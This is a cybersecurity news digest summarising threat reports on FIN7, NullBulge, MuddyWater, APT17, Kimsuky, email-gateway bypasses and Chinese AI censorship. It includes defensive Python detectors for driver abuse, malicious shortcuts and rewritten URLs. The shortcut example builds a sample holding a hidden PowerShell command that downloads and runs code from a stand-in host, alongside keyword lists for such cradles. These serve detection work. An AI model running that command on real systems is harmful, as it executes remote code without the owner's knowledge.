Daily Drop (820): | CN: Socialist AI | NullBulge | BugSleep | DPRK: RGB | TAG-100 | GhostEmperor | FIN7 | SEGs: Bypass | Paris 2024 Olympics | APT17 | Railway Security | GenAI: CNO | CNI Targeted
07-18-24
Thursday, Jul 18 2024 // (IG): BB // ShadowNews // Coffee for Bob
*Started adding Proof of Concept (PoC) links, where available, for the CVEs mentioned:
In security reporting, a Proof of Concept (PoC) is code or a step-by-step procedure that demonstrates a vulnerability can actually be triggered, showing that a reported flaw is real and exploitable rather than theoretical. A public PoC raises the urgency of patching, because it lowers the effort an attacker needs to weaponize the issue. *
China Deploys Censors to Create Socialist AI
Bottom Line Up Front (BLUF): The Cyberspace Administration of China (CAC) is requiring AI companies to ensure their large language models (LLMs) embody core socialist values, a move that extends the country's censorship regime to generative AI. Companies like ByteDance, Alibaba, Moonshot, and 01.AI are undergoing rigorous government reviews to align their AI models with political sensitivities and President Xi Jinping's ideology.
Analyst Comments: This initiative represents a significant escalation in China's control over AI technologies, ensuring that the digital outputs align with state ideology. By enforcing stringent compliance measures and incorporating political correctness into AI responses, China is setting a global precedent for politically driven AI governance. The approach of integrating ideological filtering mechanisms into AI development demonstrates the CCP's commitment to maintaining ideological purity in the face of advancing technology.
FROM THE MEDIA: The Chinese government is expanding its censorship regime to include AI systems, compelling tech giants and startups to align their large language models with socialist values. The CAC is conducting mandatory reviews of these AI models, focusing on political sensitivity and alignment with President Xi Jinping's doctrines. This process involves extensive testing and filtering of training data to remove content that contradicts core socialist values. Companies must build extensive databases of sensitive keywords and continuously update them. This has led to AI chatbots like Baidu's Ernie and Alibaba's Tongyi Qianwen avoiding politically sensitive topics, often responding with deflections or refusals. ByteDance's chatbot, which excels in compliance, received high marks from Fudan University for its adherence to ideological guidelines.
READ THE STORY: FT
Russia-Linked FIN7 Hackers Sell Security Evasion Tool on Darknet
Bottom Line Up Front (BLUF): The Russia-linked cybercriminal group FIN7 is selling its custom security evasion tool, AvNeutralizer, on darknet forums. The tool, now used by several ransomware groups, is built to disable or blind endpoint security products so that intrusions go undetected, and it has been seen in attacks across numerous sectors.
Analyst Comments: FIN7's commercialization of AvNeutralizer highlights the ongoing threat posed by sophisticated cybercriminal groups leveraging advanced tools to enhance their capabilities. The tool's adaptability and the use of multiple pseudonyms by FIN7 complicate attribution and defense efforts. This development underscores the need for robust cybersecurity measures and continuous monitoring to counter the evolving tactics of such groups.
FROM THE MEDIA: FIN7, a notorious Russian cybercriminal group, is selling a security evasion tool called AvNeutralizer on darknet forums. Initially used exclusively by the Black Basta group for six months, AvNeutralizer has since been adopted by multiple ransomware groups, including AvosLocker, MedusaLocker, BlackCat, Trigona, and LockBit. SentinelOne found advertisements for AvNeutralizer on several underground forums, posted under pseudonyms such as “goodsoft,” “lefroggy,” “killerAV,” and “Stupor.” Priced between $4,000 and $15,000, the tool is customized for each buyer to target specific security products. Since early 2023, AvNeutralizer has been observed in numerous intrusions. Its latest version adds a new tampering method that loads a built-in Windows driver, ProcLaunchMon.sys, together with the Process Explorer driver, and uses them to interfere with the protected processes of endpoint security products; with the defenses blinded or disabled, the ransomware that follows is far less likely to be detected.
READ THE STORY: The Record // THN
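The driver tampering described in the AvNeutralizer item above is an abuse of legitimate signed drivers, and it leaves a footprint: a new kernel-driver service is registered, which the Windows System log records as Event ID 7045 ("A service was installed in the system"). The following Python is an added example, not code from SentinelOne or the article, that flags such registrations. The PROCEXP152.sys file name for the Process Explorer driver is an assumption (the article names only ProcLaunchMon.sys), and the event records are constructed sample telemetry.

```python
"""Detect kernel-driver service installations matching the AvNeutralizer pattern.

Added illustration, not code from SentinelOne or the article: flags Windows
System-log events (Event ID 7045, "A service was installed in the system")
that register ProcLaunchMon.sys, the Process Explorer driver, or any kernel
driver from a non-standard directory. The event records below are constructed.
"""
import ntpath

# Driver image names tied to the technique. PROCEXP152.sys is the usual file
# name of the Process Explorer driver (assumed; the article names only
# ProcLaunchMon.sys explicitly).
WATCHLIST = {"proclaunchmon.sys", "procexp152.sys"}

# Directories Windows normally loads kernel drivers from (lower-case prefixes).
TRUSTED_DRIVER_DIRS = (
    "\\systemroot\\system32\\drivers",
    "c:\\windows\\system32\\drivers",
    "system32\\drivers",
)


def normalize_image_path(image_path: str) -> str:
    """Lower-case the path, drop surrounding quotes and the \\??\\ NT prefix."""
    path = image_path.strip().strip('"').lower()
    if path.startswith("\\??\\"):
        path = path[4:]
    return path


def evaluate_event(event: dict) -> list:
    """Return the reasons a 7045 event looks like a suspicious driver load."""
    reasons = []
    if event.get("EventID") != 7045:
        return reasons
    if "kernel" not in event.get("ServiceType", "").lower():
        return reasons          # user-mode services are out of scope here
    path = normalize_image_path(event.get("ImagePath", ""))
    name = ntpath.basename(path)
    directory = ntpath.dirname(path)
    if name in WATCHLIST:
        reasons.append(f"driver on watchlist: {name}")
    if not any(directory.startswith(d) for d in TRUSTED_DRIVER_DIRS):
        reasons.append(f"driver loaded from non-standard directory: {directory or '<none>'}")
    return reasons


def scan(events) -> dict:
    """Map ServiceName -> reasons for every flagged event."""
    findings = {}
    for event in events:
        reasons = evaluate_event(event)
        if reasons:
            findings[event.get("ServiceName", "<unnamed>")] = reasons
    return findings


# Constructed sample telemetry: one benign agent service, one benign NIC
# driver, then the two driver registrations the tool is described as using.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "EdrAgentSvc", "ServiceType": "user mode service",
     "ImagePath": "\"C:\\Program Files\\EdrVendor\\agent.exe\""},
    {"EventID": 7045, "ServiceName": "vendornic", "ServiceType": "kernel mode driver",
     "ImagePath": "\\SystemRoot\\System32\\drivers\\vendornic.sys"},
    {"EventID": 7045, "ServiceName": "ProcLaunchMon", "ServiceType": "kernel mode driver",
     "ImagePath": "\\SystemRoot\\System32\\drivers\\ProcLaunchMon.sys"},
    {"EventID": 7045, "ServiceName": "PROCEXP152", "ServiceType": "kernel mode driver",
     "ImagePath": "\\??\\C:\\Users\\Public\\PROCEXP152.SYS"},
]

if __name__ == "__main__":
    for service, reasons in scan(SAMPLE_EVENTS).items():
        print(service, "->", "; ".join(reasons))
```

Run as a script it prints the two flagged services. In production the same rule would be fed parsed 7045 events (or Sysmon Event ID 6 driver-load records), and the watchlist is the weakest part of it: the non-standard-directory check is what catches the next tool that ships a different driver.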
'NullBulge' Threat Actor Targets Software Supply Chain and AI Tech
Bottom Line Up Front (BLUF): New research by SentinelOne reveals that the threat actor "NullBulge" is targeting the software supply chain and AI-related technologies through hacktivist-themed ransomware attacks. The group has claimed responsibility for stealing data from Disney's Slack channels and conducts financially motivated operations despite its anti-AI, pro-artist persona.
Analyst Comments: NullBulge represents a significant shift in cyber threat landscapes, leveraging low-sophistication yet effective methods to infiltrate software supply chains. Their dual motivation—financial gain masked as hacktivism—illustrates the evolving complexity of modern cyber threats. The group's attacks on both AI-centric entities and unrelated religious organizations highlight a broad target spectrum, indicating that motivations can often be multifaceted and opportunistic rather than purely ideological.
FROM THE MEDIA: SentinelOne's recent report uncovers the operations of NullBulge, a ransomware group disguising its financially motivated attacks as hacktivism. NullBulge has been active since at least April 2024, targeting AI and gaming entities by planting malicious code in public repositories on platforms like GitHub and Hugging Face. Its attacks include distributing malicious mods for video games and poisoning software supply chains with compromised libraries. Despite the hacktivist front, SentinelOne found that NullBulge is financially driven, selling stolen data and OpenAI API keys on dark web forums. The group's use of LockBit ransomware and commodity malware reflects a low-sophistication approach; it is notable for carrying out effective attacks with minimal complexity.
READ THE STORY: Tech Target
TAG-100: New Threat Actor Uses Open-Source Tools for Widespread Attacks
Bottom Line Up Front (BLUF): TAG-100, a newly identified threat actor, is leveraging open-source tools and known vulnerabilities to conduct cyber espionage campaigns against global government and private sector organizations. The group has compromised entities in at least ten countries, using open-source Go-based backdoors such as Pantegana and Spark RAT, and focusing on internet-facing devices for initial access.
Analyst Comments: The emergence of TAG-100 underscores the persistent threat posed by actors who exploit open-source tools and publicly known vulnerabilities. The group's use of widely available tools and techniques highlights the ongoing challenge of defending against lower-sophistication, high-impact cyber threats. TAG-100's ability to conduct widespread reconnaissance and exploitation activities across various sectors and geographies emphasizes the importance of robust security measures and vigilant monitoring of internet-facing devices.
FROM THE MEDIA: Recorded Future's Insikt Group reports that TAG-100, a previously unreported threat actor, is running a cyber espionage campaign built on open-source remote access tools. Active since February 2024, TAG-100 has targeted entities across Africa, Asia, North America, South America, and Oceania, including diplomatic and government organizations, as well as sectors such as semiconductors, non-profits, and religious institutions. TAG-100 exploits security flaws in internet-facing devices such as Citrix NetScaler, F5 BIG-IP, Zimbra, Microsoft Exchange Server, SonicWall, Cisco ASA, Palo Alto Networks GlobalProtect, and Fortinet FortiGate. Notably, the group conducted large-scale reconnaissance against Palo Alto Networks GlobalProtect appliances shortly after a critical vulnerability in that product was publicly disclosed.
READ THE STORY: THN
Iranian Cyber Threat Group Deploys New Backdoor 'BugSleep'
Bottom Line Up Front (BLUF): The Iranian cyber-espionage group MuddyWater has introduced a new custom backdoor implant called BugSleep, shifting from their previous reliance on legitimate remote management tools. This transition underscores a strategic adaptation in their cyber-attack methodology.
Analyst Comments: MuddyWater's pivot to deploying a bespoke backdoor like BugSleep indicates a significant evolution in their tactics, possibly driven by increased scrutiny of remote management tools by security vendors. Despite inherent bugs and rapid updates in BugSleep, this development reflects MuddyWater's agility and persistence. Their focus on high-profile targets in Israel, Saudi Arabia, and beyond emphasizes Iran's continued aggressive stance in cyber-espionage.
FROM THE MEDIA: MuddyWater, an Iranian cyber-espionage group associated with the Iranian Ministry of Intelligence and Security (MOIS), has shifted from using legitimate remote management software to deploying a custom backdoor named BugSleep. Previously, the group took control of infected systems with tools like SimpleHelp and Atera, delivered through spear phishing and attacks on exposed servers. In June it switched to a new chain: a malicious PDF lure containing a link to a file hosted on Egnyte, which installs BugSleep. The implant, identified by Check Point Software and dubbed MuddyRot by Sekoia, is still under development; it carries the usual anti-analysis techniques and string encryption, though these are often implemented incorrectly. Despite its bugs and frequent updates, the homemade implant signals a strategic shift, most likely a response to increased monitoring of remote management tools by security vendors. The group, active since at least 2018, targets government agencies and critical industries, primarily in the Middle East but also in countries such as India and Turkey.
READ THE STORY: Dark Reading
China-Linked APT17 Targets Italian Companies with 9002 RAT Malware
Bottom Line Up Front (BLUF): APT17, a Chinese state-sponsored hacking group, has launched sophisticated cyber espionage campaigns targeting Italian government agencies and companies using the 9002 RAT malware. These attacks involved spear-phishing emails and fake Skype for Business installations to deploy the malware.
Analyst Comments: APT17's continued use of advanced tactics, including the deployment of diskless malware variants and sophisticated spear-phishing lures, underscores the persistent threat posed by state-sponsored cyber espionage groups. The group's ability to adapt and update their malware to evade detection highlights the need for robust cybersecurity measures and continuous monitoring to protect sensitive government and corporate data.
FROM THE MEDIA: Italian cybersecurity firm TG Soft reported that APT17, also known as DeputyDog, launched two targeted attacks on Italian entities on June 24 and July 2, 2024. The campaigns used Office documents and malicious links to lure recipients into downloading a fake Skype for Business package, which installed the 9002 RAT. The infection chain was multi-stage and, in one variant, diskless, keeping the payload in memory rather than on disk to reduce forensic traces. 9002 RAT is a modular trojan that monitors network traffic, captures screenshots, manages processes, and executes additional commands from a remote server; it has a long history, including Operation Aurora, the 2009 intrusions into Google and other large companies. Its modular design and continuous updates make it a durable espionage tool, and the campaign shows the group still relies on spear phishing and trojanized installers to reach sensitive government and corporate data.
READ THE STORY: THN // TG Soft
Generative AI Gives Government Cyber Operations a Boost
Bottom Line Up Front (BLUF): State and local governments are increasingly leveraging generative AI to enhance cybersecurity operations. This advanced AI technology aids in synthesizing threat data, improving incident response, and customizing detection systems, thereby reducing the need for human intervention and enabling more effective defense against sophisticated cyber threats.
Analyst Comments: Generative AI represents a significant advancement in cybersecurity, particularly for government agencies tasked with protecting critical infrastructure. Its ability to process vast amounts of data and provide contextual analysis enhances traditional cybersecurity measures. However, the technology is not without its challenges, including inconsistent outputs and the need for further refinement to ensure reliable, consistent results.
FROM THE MEDIA: State and local government cybersecurity operations are experiencing a transformative boost from generative AI, according to experts interviewed by StateScoop. While AI has long been a staple in cybersecurity for threat detection and incident response, generative AI brings a new layer of sophistication by synthesizing data and providing contextual insights. Andy Hanks, a senior director at the Center for Internet Security, emphasizes the importance of generative AI in quickly processing large volumes of data and contextualizing it, which enhances threat detection and incident response. This technology complements existing expert systems that rely on pattern recognition and frequent updates to detect known threats.
READ THE STORY: STATESCOOP
North Korean Threat Actor Kimsuky Evolves Despite Sanctions
Bottom Line Up Front (BLUF): Kimsuky, a North Korean state-sponsored hacking group, continues to advance its operations despite international sanctions. Recent research by Rapid7 shows that Kimsuky has expanded its targets beyond North Korean interests to include entities in Japan, the United States, and Europe, using sophisticated phishing techniques and a global infrastructure.
Analyst Comments: Kimsuky's evolution underscores the persistent and adaptive nature of North Korean cyber-espionage efforts. The group's ability to diversify its targets and maintain a rapid development cycle for its malware tools demonstrates the resilience and resourcefulness typical of state-backed cyber operations. The ineffectiveness of sanctions highlights the challenges in curbing cyber threats from autocratic regimes with dedicated intelligence apparatuses like North Korea's Reconnaissance General Bureau (RGB).
FROM THE MEDIA: Rapid7's latest research reveals that Kimsuky, a North Korean hacking group linked to the Reconnaissance General Bureau (RGB), has adapted and expanded its operations despite facing international sanctions. Known for delivering malicious Windows shortcut (.LNK) files and Compiled HTML Help (.CHM) files by email and other phishing techniques, Kimsuky has shifted from primarily targeting government and research entities concerned with North Korea to also targeting entities in Japan, the United States, and Europe. The group employs a variety of lures, such as nuclear strategy topics, corporate promotional material, and foreign embassy communications, to steal credentials and gain mailbox access for sensitive data theft. Its operations are supported by a globally distributed infrastructure and actively maintained malware, indicating a well-resourced and skilled developer pool.
READ THE STORY: Cyber Daily AU
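A malicious .LNK of the kind the Kimsuky item above describes is just a shortcut whose target is an interpreter and whose arguments carry the real payload, often with the window minimized so the victim sees nothing. The following Python is an added example, not code from Rapid7 or the article: a minimal parser for the MS-SHLLINK header and StringData section that pulls out the target path, arguments and ShowCommand and flags the usual warning signs. The two sample shortcuts are built inside the block and use the reserved example.invalid domain; real samples may also carry an IDList, a LinkInfo block and trailing extra data blocks, which this parser skips or ignores.

```python
"""Extract and triage the command line hidden in a Windows shortcut (.LNK).

Added illustration, not code from Rapid7 or the article. The fields that
matter for triage are the relative path (what gets launched), the
arguments (what it is launched with) and ShowCommand (whether the window
is kept out of sight). Layout follows the MS-SHLLINK header and StringData
sections; the sample shortcuts are constructed here.
"""
import struct

HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# LinkFlags bits (MS-SHLLINK 2.1.1).
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData entries appear in this fixed order when their flag is set.
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

SW_SHOWMINNOACTIVE = 7

# Interpreters and download helpers commonly launched from malicious shortcuts.
LOLBINS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript",
           "rundll32", "regsvr32", "certutil", "bitsadmin", "curl.exe")


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields plus ShowCommand of a Shell Link file."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a Shell Link (.LNK) file")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (.LNK) file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    show_command = struct.unpack_from("<I", data, 0x3C)[0]
    offset = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip the IDList (2-byte size prefix)
        offset += 2 + struct.unpack_from("<H", data, offset)[0]
    if flags & HAS_LINK_INFO:                    # skip LinkInfo (self-sized)
        offset += struct.unpack_from("<I", data, offset)[0]
    link = {"flags": flags, "show_command": show_command}
    for bit, key in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, offset)[0]   # count is in characters
        offset += 2
        if flags & IS_UNICODE:
            link[key] = data[offset:offset + count * 2].decode("utf-16-le")
            offset += count * 2
        else:
            link[key] = data[offset:offset + count].decode("cp1252", errors="replace")
            offset += count
    return link


def assess(link: dict) -> list:
    """Return human-readable indicators that the shortcut is a launcher, not a file link."""
    indicators = []
    target = (link.get("relative_path", "") + " " + link.get("arguments", "")).lower()
    for binary in LOLBINS:
        if binary in target:
            indicators.append(f"launches {binary}")
    args = link.get("arguments", "")
    lowered = args.lower()
    if any(tok in lowered for tok in ("-enc", "iex", "downloadstring", "http://", "https://", "hidden")):
        indicators.append("encoded, hidden or download-cradle command line")
    if len(args) > 200:
        indicators.append(f"unusually long arguments ({len(args)} chars)")
    if link["show_command"] == SW_SHOWMINNOACTIVE:
        indicators.append("window set to SW_SHOWMINNOACTIVE (opens minimized, easy to miss)")
    return indicators


def build_lnk(relative_path: str, arguments: str = "", show_command: int = 1) -> bytes:
    """Build a minimal Unicode .LNK for the samples below (header + StringData only)."""
    flags = HAS_RELATIVE_PATH | IS_UNICODE | (HAS_ARGUMENTS if arguments else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b""
    for text in ((relative_path, arguments) if arguments else (relative_path,)):
        body += struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + body


# Constructed samples: a normal document shortcut and a PowerShell launcher.
BENIGN_LNK = build_lnk("..\\Documents\\report.docx")
MALICIOUS_LNK = build_lnk(
    "..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "-WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "
    "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')\"",
    show_command=SW_SHOWMINNOACTIVE,
)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_LNK), ("malicious", MALICIOUS_LNK)):
        link = parse_lnk(blob)
        print(label, link.get("relative_path"), link.get("arguments", ""), assess(link))
```

The same parser applied at the mail gateway, including to .LNK files inside archives, turns "attachment is a shortcut" into "attachment launches powershell.exe with a download cradle", which is the finding an analyst actually needs.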
'GhostEmperor' Returns: Mysterious Chinese Hacking Group Spotted After Two-Year Hiatus
Bottom Line Up Front (BLUF): GhostEmperor, a covert Chinese hacking group known for sophisticated supply-chain attacks in Southeast Asia, has resurfaced after a two-year absence. The group, renowned for deploying advanced kernel-level rootkits, has been linked to a recent incident involving the compromise of a client's network to access another victim's systems.
Analyst Comments: GhostEmperor's reappearance underscores the persistent and evolving nature of state-sponsored cyber threats. The group's use of kernel-level rootkits, which evade common detection tools, highlights the ongoing challenge of defending against highly skilled adversaries. Their capability to exploit supply-chain vulnerabilities for broader access signifies a mature and strategic approach to cyber espionage, likely driven by geopolitical motives.
FROM THE MEDIA: GhostEmperor, a sophisticated Chinese hacking group, has been identified by cybersecurity firm Sygnia after a two-year period of apparent inactivity. Initially reported by Kaspersky Lab in 2021, GhostEmperor is notorious for executing supply-chain attacks targeting telecommunications and government entities in Southeast Asia. Sygnia's latest report links the group to a recent incident where a compromised network was used to access another system. The group's hallmark is the use of a kernel-level rootkit named Demodex, which provides access to the deepest layers of the operating system, effectively bypassing endpoint detection and response (EDR) software. This sophisticated tool has been updated since its last known variant, indicating ongoing development and enhancement of their methods.
READ THE STORY: The Record
Threat Actors Ramp Up Use of Encoded URLs to Bypass Secure Email
Bottom Line Up Front (BLUF): Threat actors are increasingly using encoded URLs to bypass Secure Email Gateways (SEGs), exploiting weaknesses in how SEGs handle these URLs. This tactic allows malicious emails to evade detection and reach their targets.
Analyst Comments: The rising use of SEG-encoded URLs by cybercriminals highlights a critical vulnerability in email security infrastructure. SEGs, designed to protect against various email threats, may inadvertently allow malicious links by treating encoded URLs as safe. This underscores the need for enhanced email security measures and continued vigilance from users to recognize and avoid suspicious links, even if they appear encoded or from trusted sources.
FROM THE MEDIA: Cofense researchers have identified a significant increase in attacks that use SEG-encoded URLs to bypass email security. A SEG rewrites the links in email it processes so that each click is routed through the vendor's own infrastructure, which checks the destination at click time. Attackers abuse this by sending their phishing links through a SEG of their own, so the malicious link arrives on the recipient's side already rewritten to a reputable vendor domain. Some receiving SEGs then treat that encoded link as safe, or fail to resolve it to its final destination before scanning, and let the message through. Max Gannon, threat intelligence manager at Cofense, explains that the problem arises because some SEGs implicitly trust encoded URLs or do not properly scan them. The rewriting services observed in these campaigns include VIPRE, Bitdefender LinkScan, Hornet Security, and Barracuda.
READ THE STORY: Dark Reading
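The SEG bypass above works because the receiving gateway judges a link by the domain it sees, not by where the link finally lands. The following Python is an added example, not Cofense's or any vendor's code, that peels rewrite layers off a URL and judges the final destination, beside the naive allow-the-rewriter check the article describes. The rewriter formats are assumptions modeled on the Microsoft Safe Links query-string style rather than the exact formats of the vendors named, and the wrapped sample URL is constructed with example.invalid hosts.

```python
"""Resolve gateway-rewritten ("encoded") URLs to their real destination.

Added illustration, not code from Cofense or any SEG vendor. The rewriter
formats below are ASSUMED (modeled on the Safe Links query-string style);
the sample URL and blocklist are constructed and use example.invalid hosts.
"""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Rewriter domain -> query parameter carrying the embedded destination (assumed formats).
REWRITER_QUERY_KEYS = {
    "safelinks.protection.outlook.com": "url",
    "linkscan.example-seg.invalid": "u",
}
# Hosts the recipient organization refuses to deliver links to (constructed).
BLOCKLIST = {"phish.example.invalid"}

# Start of an http(s) URL, plain or percent-encoded once.
URL_START = re.compile(r"https?(?::|%3a)(?:/|%2f){2}", re.IGNORECASE)


def _host(url: str) -> str:
    return (urlsplit(url).hostname or "").lower()


def _is_rewriter(host: str):
    """Return the matching rewriter domain for host, or None."""
    for rewriter in REWRITER_QUERY_KEYS:
        if host == rewriter or host.endswith("." + rewriter):
            return rewriter
    return None


def unwrap_once(url: str):
    """Peel one rewrite layer; return the inner URL or None if there is none."""
    parts = urlsplit(url)
    rewriter = _is_rewriter((parts.hostname or "").lower())
    if rewriter:
        inner = parse_qs(parts.query).get(REWRITER_QUERY_KEYS[rewriter])
        if inner:
            return inner[0]                 # parse_qs already percent-decodes once
    # Generic fallback: a second URL embedded anywhere in the path or query.
    starts = list(URL_START.finditer(url))
    if len(starts) > 1:
        embedded = url[starts[1].start():].split("&", 1)[0]
        return unquote(embedded)
    return None


def unwrap(url: str, max_depth: int = 5) -> list:
    """Return the chain of URLs from the wrapped link down to the final destination."""
    chain = [url]
    while len(chain) <= max_depth:
        inner = unwrap_once(chain[-1])
        if inner is None or inner == chain[-1]:
            break
        chain.append(inner)
    return chain


def naive_verdict(url: str) -> str:
    """The flawed behaviour: a link on a known rewriter domain is waved through."""
    host = _host(url)
    if _is_rewriter(host):
        return "allow"
    return "block" if host in BLOCKLIST else "allow"


def verdict(url: str) -> str:
    """Judge the final destination, however many rewrite layers sit in front of it."""
    return "block" if _host(unwrap(url)[-1]) in BLOCKLIST else "allow"


# Constructed sample: phishing link wrapped by a hypothetical scanner, then
# rewritten again by a Safe Links-style gateway on the sending side.
WRAPPED_SAMPLE = (
    "https://nam02.safelinks.protection.outlook.com/?url="
    "https%3A%2F%2Flinkscan.example-seg.invalid%2Fscan%3Fu%3D"
    "https%253A%252F%252Fphish.example.invalid%252Flogin&data=abc123"
)

if __name__ == "__main__":
    for hop in unwrap(WRAPPED_SAMPLE):
        print(hop)
    print("naive:", naive_verdict(WRAPPED_SAMPLE), "| resolved:", verdict(WRAPPED_SAMPLE))
```

The fallback that pulls a second http(s) URL out of the path or query also catches path-style rewrites, at the cost of truncating an unencoded inner URL at its first "&". String unwrapping is only the first step: a receiving gateway should still fetch and scan the resolved destination, since the rewriter's own click-time check belongs to whoever sent the mail.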
Paris 2024 Olympics Face Escalating Cyber-Threats
Bottom Line Up Front (BLUF): Cybersecurity analysts warn of increasing cyber threats targeting the Paris 2024 Olympics, with a notable rise in darknet activity and sophisticated cyber-attacks aimed at exploiting the global event. Phishing kits, fake ticketing platforms, and hacktivist activities are among the primary concerns.
Analyst Comments: The surge in cyber threats surrounding the Paris 2024 Olympics reflects a broader trend of cybercriminals exploiting high-profile events. The proliferation of phishing kits and fake websites poses significant risks to attendees, while the geopolitical motivations of hacktivist groups add another layer of complexity. Robust cybersecurity measures, public awareness, and vigilance are crucial to mitigating these threats and ensuring the safety of participants and spectators.
FROM THE MEDIA: FortiGuard Labs reports a significant increase in cyber threats targeting the Paris 2024 Olympics, with darknet activity surging by 80-90% between the latter half of 2023 and the first half of 2024. Zendata CEO Narayana Pappu emphasizes the heightened cybersecurity risks, noting the nearly 450 million cyber-attacks during the Tokyo Olympics and the growing sophistication of such threats. The report highlights several key concerns, including the rise of phishing kits tailored for the Olympics, which enable cybercriminals to create deceptive emails and websites. These attacks are compounded by fake ticketing platforms and fraudulent merchandise sites, posing financial risks to attendees.
READ THE STORY: InfoSecMag
Stay Ahead of Quantum Threat to Railway Security
Bottom Line Up Front (BLUF): Benoît Leridon of Nokia warns of increasing cyber threats to digital railway systems, including the emerging risks posed by quantum computing. As railways adopt advanced digital technologies, they must bolster cybersecurity measures to safeguard against these sophisticated threats.
Analyst Comments: The transition to digital railway systems brings both opportunities and challenges. While digitalization enhances efficiency and safety, it also introduces new vulnerabilities. The potential of quantum computing to break current encryption methods is a significant concern. Railway operators must adopt robust, quantum-safe encryption and comprehensive cybersecurity strategies to protect critical infrastructure and ensure safe, reliable operations.
FROM THE MEDIA: As railway systems increasingly rely on digital technologies, cybersecurity has become a paramount concern. Benoît Leridon, Head of Transportation Business for Network Infrastructure at Nokia, highlights the critical need for robust cybersecurity measures to protect against threats, including the emerging risks from quantum computing. Digital railways depend on vast amounts of data for reliable and secure operations. Innovations like AI, IoT, and digital twins are driving automation and efficiency, but also expanding the attack surface. Cyber threats, including eavesdropping, man-in-the-middle attacks, and denial-of-service (DoS) attacks, exploit vulnerabilities in interconnected systems.
READ THE STORY: Global Railway Review
Items of interest
Ransomware Continues to Pile on Costs for Critical Infrastructure Victims
Bottom Line Up Front (BLUF): Ransomware attacks on critical national infrastructure (CNI) have seen a dramatic rise in costs and recovery times. The median ransom payments have surged to $2.54 million, with significant increases in recovery expenses, particularly in the energy and water sectors.
Analyst Comments: The escalating costs and extended recovery times associated with ransomware attacks on CNI highlight the urgent need for stronger cybersecurity measures and policies. While paying ransoms often seems like a quick fix, it generally fails to reduce recovery times and may encourage further attacks. Organizations must focus on comprehensive defense strategies and resilience planning to mitigate these impacts effectively.
FROM THE MEDIA: Sophos' latest figures reveal a sharp increase in the costs associated with ransomware attacks on CNI organizations. The median ransom payment has soared to $2.54 million, roughly 41 times last year's $62,500, and the mean payment for 2024 stands at $3.225 million, a sixfold increase. The survey covered 275 CNI organizations, but only 86 disclosed their ransom payment details, so the figures rest on a small sample and the true costs could be higher still. IT, technology, and telecom organizations reported the lowest average payments at $330,000, whereas lower education and federal government organizations reported the highest, averaging $6.6 million.
READ THE STORY: The Register
How to Stop an Army of 14 Million Zombie Computers: Ep. 94: Mariposa Botnet (Video)
FROM THE MEDIA: When Chris Davis sniffed out some strange Web traffic patterns, he peeled back the layers to discover one of the largest botnets ever created. But what was it for? And who is behind this malicious network?
The Largest Botnet Ever (Video)
FROM THE MEDIA: Some botnets have grown to incredible sizes and power, but how much damage can they really do?
The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.